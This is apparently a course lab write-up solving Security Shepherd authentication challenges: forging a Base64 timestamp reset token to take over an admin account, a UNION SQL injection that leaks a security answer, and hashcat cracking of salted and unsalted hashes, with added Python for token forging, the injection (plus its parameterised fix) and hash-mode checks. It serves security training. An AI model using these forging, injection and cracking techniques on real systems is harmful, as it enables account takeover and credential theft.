---
title: Unit 6 and 5 solutions
---

# User Authentication Challenge 2 and 3

#### User Authentication Challenge 2

* Click "forgotten password".
* Enter the username `admin` and click "Send Email".
* You will see something like: **URL with embedded password reset token has been sent to 'admin' via email.**

![](https://i.imgur.com/3T9oDVw.png)

* Inspect the page and look through the inline script; scroll down until you find the part associated with changing the password (the reset form). Searching for the word "leform" finds the script quickly.

![](https://i.imgur.com/WeBdeti.png)

```javascript
type: "POST",
url: "7aed58f3a00087d56c844ed9474c671f8999680556c127a19ee79fa5d7a132e1ChangePass",
data: {
    userName: theUserName,
    newPassword: theNewPassword,
    resetPasswordToken: theToken
},
```

- Send the "reset password" request (the one in which you submitted `admin`) to Repeater. It looks like this:

![](https://i.imgur.com/qF4D9n7.png)

- Now edit the request:
  - Change the POST path to the URL from the script: `/challenges/7aed58f3a00087d56c844ed9474c671f8999680556c127a19ee79fa5d7a132e1ChangePass`
  - Add the three form fields: `userName=admin&newPassword=Test123456789&resetPasswordToken=Test`
- Send it. You will receive an error: `Could not parse/manipulate date or time from token: java.text.ParseException: Unparseable date: "M?`

![](https://i.imgur.com/DYwTjmB.png)

- This says the token is decoded before it is parsed, so we need to encode what we submit as the token; I used Base64 and tested it.
- Now you will get an error related to the time, so Base64-encode your current time.
- The format the server parses (the same as Java's default `Date.toString()` output, `EEE MMM dd HH:mm:ss zzz yyyy`) looks like this: `Sat Oct 15 07:49:00 PDT 2022`
- Submit a string in that format after encoding it to Base64.
- Note: use the current time with the right timezone abbreviation, i.e. during daylight saving time use PDT/EDT/CDT etc. (based on the location you are in) and for the remainder of the year use PST/CST/EST.
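Why the literal `Test` token produced `Unparseable date: "M?` and how to mint one that parses, as an added example (my code, not part of the original writeup or of the challenge application): the server Base64-decodes the token and parses the result as a Java `Date` string. Decoding `Test` yields the bytes `4d eb 2d`, i.e. `M` followed by an invalid character, which is exactly what the error message echoes. The helper names below are my own; the timezone abbreviation is passed in explicitly because the challenge wants your local zone, and the day/month names are hard-coded so the output does not depend on the host locale. The security point is that the token carries no secret at all, only a timestamp, so anyone can build a valid one.

```python
"""Forge a timestamp-only password-reset token (added example)."""
import base64
from datetime import datetime
from urllib.parse import urlencode

# English names fixed in code so strftime's locale cannot change them.
_DAYS = ["Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun"]
_MONTHS = ["Jan", "Feb", "Mar", "Apr", "May", "Jun",
           "Jul", "Aug", "Sep", "Oct", "Nov", "Dec"]

# The token from the writeup, kept here to check the encoder against it.
PAGE_TOKEN = "RnJpIE1hciAyNSAxOTo0OTowMCBQRFQgMjAyMg=="


def java_date_string(dt: datetime, tz_abbrev: str) -> str:
    """Format dt like Java's Date.toString(): 'EEE MMM dd HH:mm:ss zzz yyyy'.

    tz_abbrev (PDT/PST, EDT/EST, ...) is supplied by the caller; the
    challenge expects the zone you are actually in.
    """
    return "%s %s %02d %02d:%02d:%02d %s %04d" % (
        _DAYS[dt.weekday()], _MONTHS[dt.month - 1], dt.day,
        dt.hour, dt.minute, dt.second, tz_abbrev, dt.year)


def make_token(dt: datetime, tz_abbrev: str) -> str:
    """The whole token is just the timestamp string, Base64-encoded."""
    text = java_date_string(dt, tz_abbrev).encode("ascii")
    return base64.b64encode(text).decode("ascii")


def decode_token(token: str) -> bytes:
    """Reverse the encoding to see what the server will try to parse as a date."""
    return base64.b64decode(token)


def reset_body(username: str, new_password: str, token: str) -> str:
    """Build the x-www-form-urlencoded body for the ...ChangePass request.

    urlencode percent-encodes the Base64 padding ('=' becomes %3D), which is
    what a browser submitting the form would send.
    """
    return urlencode({"userName": username,
                      "newPassword": new_password,
                      "resetPasswordToken": token})


def page_example() -> str:
    """Rebuild the writeup's own token: Fri Mar 25 19:49:00 PDT 2022."""
    return make_token(datetime(2022, 3, 25, 19, 49, 0), "PDT")


if __name__ == "__main__":
    import time
    # Use the host's current local time and zone abbreviation.
    token = make_token(datetime.now(), time.strftime("%Z"))
    print(reset_body("admin", "Test123456789", token))
```

Paste the printed body into the Repeater request; if the server rejects it with a time-related error, check that the abbreviation `time.strftime("%Z")` produced matches the zone the challenge expects (PDT versus PST, for example).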
- Finally you will have something like: `userName=admin&newPassword=Test123456789&resetPasswordToken=RnJpIE1hciAyNSAxOTo0OTowMCBQRFQgMjAyMg==` (that token is `Fri Mar 25 19:49:00 PDT 2022` in Base64)

![](https://i.imgur.com/FugVajt.png)

Once you send this you will see the password-change success message. Now log in as `admin` with the password you used above.

![](https://i.imgur.com/Uu3hOyH.png)

**NOTE: Use your exact local time, including whether daylight saving time is currently in effect where you are (the PDT/PST distinction above is for US zones).**

----

#### User Authentication Challenge 3

## Method 1:

- The login form asks for a username and password, so first we need a valid username.
- I brute-forced the username field with a random set of names as the payload in place of `admin`.
- One name that works is `sean`; submit it with any password and the response gives you the email: `zoidberg24@shepherd.com`
- Click "Have you forgotten your password?" and enter `zoidberg24@shepherd.com` to get the security question.
- The question is: "What is the first name of the person you first kissed?"
- The email field is injectable, so enter this query in the email box: `" UNION ALL SELECT secretAnswer FROM users WHERE username="sean`
- The page returns the answer: `Ronit Tornincasa`
- Now submit the email and the answer to get the secret key.

![](https://i.imgur.com/TIg2uJi.png)

## Method 2:

- Log in as `manager`, `root` or `Administrator`:
  - `root` gives the email `elitehacker@shepherd.com`
  - `Administrator` gives the email `buzzthebald@shepherd.com`
- Click "forgot password"; the security question is: "What is the last name of the teacher who gave you your first failing grade?"
- Use the same kind of UNION query (with the right username) or brute-force the answer.

----

Use CyberChef or hashcat for the remaining problems; I only cover the hashcat part here.

To install hashcat, follow the instructions at https://courses.codepath.com/courses/tech_fellow_training/unit/6#!lab

Pre-steps: install the Kali image from Docker:

1. Pull Kali by running `docker pull kalilinux/kali-rolling`
2. Run it interactively: `docker run --tty --interactive kalilinux/kali-rolling /bin/bash`
3. Update Kali: `apt-get update`
4. Install hashcat: `apt-get install hashcat`
5. Run `hashcat` to confirm that it is installed properly
6. Create the `rockyou-75.txt` password file (steps 7-11):
7. To install the vi editor, first run `apt-get update` and then `apt-get install vim`
8. Create the file: `touch rockyou-75.txt`
9. Open it: `vi rockyou-75.txt`
10. Press `i` to insert, then copy and paste everything from https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Leaked-Databases/rockyou-75.txt
11. Wait until the paste has completed, then press `Esc` and type `:wq!` to save the file.

Note: read `hashcat --help` to understand what each option means.

---

### Password Hashing 1

- Create a `test.txt` file containing the MD5 hash.
- Run `hashcat -m 0 -a 0 test.txt rockyou-75.txt`
- To view the cracked plaintext: `hashcat -m 0 -a 0 test.txt rockyou-75.txt --show`
  - `-m` is the hash type; `0` means MD5
  - `-a` is the attack mode; `0` means straight (dictionary) attack

![](https://i.imgur.com/H78OXMt.png)
![](https://i.imgur.com/1EeR7yp.png)

---

### Password Hashing 2

- Save the hash to `test.txt`, appending the salt after a colon (`hash:salt`):
  ```
  dc6f0dbebfc5747330deeedfbd8475568a740d0a:80808080
  ```
- Run `hashcat -m 120 -a 0 test.txt rockyou-75.txt`. Mode 120 is `sha1($salt.$pass)`, i.e. SHA-1 over the salt followed by the password; the `hash:salt` form of the line is how hashcat learns the salt.
- After the command completes you will be able to see the key the same way as in the previous challenge (`--show`).

![](https://i.imgur.com/Ou5yCn9.png)

---

### Password Hashing 3

- Save the hash to the file again, in the same `hash:salt` form:
  ```
  FF8D646AC52B7794ADADDAAD606042FF6D2D71C5B91CBF1C11D411C790419CF1651EBE71551CD1973ABAC9D32D1392122CC676F4AA8494E7DA6325A1050FD2DA:31415926535897932384626433832795028841
  ```

![](https://i.imgur.com/OYKsBQH.png)

- Run `hashcat -m 1710 -a 0 test.txt rockyou-75.txt`. Mode 1710 is `sha512($pass.$salt)`, SHA-512 over the password followed by the salt (note the salt order is the opposite of mode 120).

---

### Password Hashing 4

- Save the hash to a file again; I saved mine as `4.txt`.
- Run `hashcat -m 100 -a 3 4.txt ?d?d?d?d?d?d?d?d?d?d`. Mode 100 is plain SHA-1; attack mode 3 is a brute-force (mask) attack, and each `?d` matches one digit, so this mask tries every 10-digit number.

Note: read about hash modes and attack modes by running `hashcat --help`.

----
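Going back to Challenge 3: the reason `" UNION ALL SELECT secretAnswer FROM users WHERE username="sean` works in the email box is that the "forgotten password" lookup splices the email string straight into its SQL. The following is an added example of that bug and its fix (my code against a constructed in-memory SQLite table, not the challenge application's code). The table, column names and the placeholder secret answers are my assumptions; only the usernames and emails come from the writeup. This toy query delimits its string with `'`, so the payload here uses `'` where the Shepherd payload uses `"`; the shape is otherwise identical.

```python
"""UNION-based SQL injection in a security-question lookup (added example)."""
import sqlite3

# Constructed sample data. The secret answers are placeholders, not the
# challenge's real answers.
USERS = [
    ("sean", "zoidberg24@shepherd.com",
     "What is the first name of the person you first kissed?",
     "example-answer-1"),
    ("Administrator", "buzzthebald@shepherd.com",
     "What is the last name of the teacher who gave you your first failing grade?",
     "example-answer-2"),
]


def build_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, email TEXT, "
                "secretQuestion TEXT, secretAnswer TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", USERS)
    return con


def question_for_email_vulnerable(con, email: str):
    """The lookup built by string concatenation: whatever the user types in
    the email box becomes part of the SQL statement."""
    sql = "SELECT secretQuestion FROM users WHERE email='%s'" % email
    row = con.execute(sql).fetchone()
    return row[0] if row else None


def question_for_email_safe(con, email: str):
    """Same lookup with a bound parameter: the input is only ever data."""
    row = con.execute("SELECT secretQuestion FROM users WHERE email=?",
                      (email,)).fetchone()
    return row[0] if row else None


def union_payload(username: str) -> str:
    """Close the email literal, UNION in a different column, and leave the
    final quote for the application's own closing ' to complete."""
    return "' UNION ALL SELECT secretAnswer FROM users WHERE username='" + username


def quote_breaks_query(con) -> bool:
    """The classic probe: a lone quote that causes a SQL syntax error shows
    the field is being concatenated into the query."""
    try:
        question_for_email_vulnerable(con, "'")
        return False
    except sqlite3.OperationalError:
        return True


def demo():
    con = build_db()
    return {
        "normal": question_for_email_vulnerable(con, "zoidberg24@shepherd.com"),
        "probe": quote_breaks_query(con),
        # The page asks for a question but the UNION row supplies the answer.
        "injected": question_for_email_vulnerable(con, union_payload("sean")),
        "safe": question_for_email_safe(con, union_payload("sean")),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v!r}")
```

The injected query becomes `... WHERE email='' UNION ALL SELECT secretAnswer FROM users WHERE username='sean'`: the first SELECT matches nothing, so the only row the page renders in its "question" slot is the answer. The parameterised version returns nothing for the same input because the quote never leaves the data value.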
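The `hash:salt` line shape and the mode number together decide whether hashcat puts the salt before or after the password, and a wrong choice does not produce an error; hashcat simply finds nothing. This added example (my code, not hashcat's) reimplements just enough of modes 0, 100, 110, 120, 1710 and 1720, of the straight attack (`-a 0`) and of a `?d`/`?l` mask attack (`-a 3`) with `hashlib` to check a line against candidates and to watch a salt-order mismatch fail. The wordlist and the salted test line are constructed here; the only page value used is the `dc6f…:80808080` line, to show how it splits.

```python
"""Hashcat mode semantics and hash:salt parsing, checked with hashlib (added example)."""
import hashlib
import itertools
from typing import Iterable, Optional

# hashcat mode -> (hash function, where the salt goes). Only the modes the
# writeup uses plus their salt-swapped twins, so a mismatch is easy to see.
MODES = {
    0:    (hashlib.md5,    None),      # MD5
    100:  (hashlib.sha1,   None),      # SHA1
    110:  (hashlib.sha1,   "suffix"),  # sha1($pass.$salt)
    120:  (hashlib.sha1,   "prefix"),  # sha1($salt.$pass)
    1710: (hashlib.sha512, "suffix"),  # sha512($pass.$salt)
    1720: (hashlib.sha512, "prefix"),  # sha512($salt.$pass)
}


def digest(mode: int, password: str, salt: str = "") -> str:
    fn, placement = MODES[mode]
    data = password.encode()
    if placement == "prefix":
        data = salt.encode() + data
    elif placement == "suffix":
        data = data + salt.encode()
    return fn(data).hexdigest()


def parse_line(line: str):
    """Split a hashcat input line into (hash, salt); salt is '' when absent."""
    h, _, salt = line.strip().partition(":")
    return h.lower(), salt


def guess_family(hexhash: str) -> str:
    """Hex length narrows the family; it says nothing about salt order."""
    return {32: "MD5", 40: "SHA-1", 64: "SHA-256",
            128: "SHA-512"}.get(len(hexhash), "unknown")


def crack(line: str, mode: int, candidates: Iterable[str]) -> Optional[str]:
    """Straight (-a 0) attack: hash each candidate the way the mode says and
    compare with the target. Returns the plaintext or None."""
    target, salt = parse_line(line)
    for pw in candidates:
        if digest(mode, pw, salt) == target:
            return pw
    return None


def mask_candidates(mask: str) -> Iterable[str]:
    """A small subset of hashcat's -a 3 masks: ?d digits, ?l lowercase."""
    sets = {"d": "0123456789", "l": "abcdefghijklmnopqrstuvwxyz"}
    parts = [sets[c] for c in mask.split("?") if c]
    return ("".join(t) for t in itertools.product(*parts))


def demo():
    wordlist = ["123456", "password", "iloveyou"]  # constructed stand-in for rockyou-75
    # A constructed line in the same shape as Password Hashing 2's hash:salt.
    salted = digest(120, "iloveyou", "80808080") + ":80808080"
    page_hash, page_salt = parse_line("dc6f0dbebfc5747330deeedfbd8475568a740d0a:80808080")
    return {
        "page_family": guess_family(page_hash),
        "page_salt": page_salt,
        "mode_120": crack(salted, 120, wordlist),             # right order
        "mode_110_wrong_order": crack(salted, 110, wordlist),  # silently fails
        # Password Hashing 4 in miniature: mask attack on an unsalted SHA-1.
        "mask": crack(digest(100, "0427"), 100, mask_candidates("?d?d?d?d")),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v!r}")
```

When a salted hash will not crack, trying the sibling mode (110 for 120, 1720 for 1710) is the first thing to do before blaming the wordlist. The 4-digit mask here is `10^4` candidates; the 10-digit mask in Password Hashing 4 is `10^10`, which is why that challenge is left to hashcat on real hardware rather than to Python. If pasting the wordlist into vi is painful, `apt-get install curl` followed by `curl -LO` with the raw GitHub URL above fetches `rockyou-75.txt` directly inside the container.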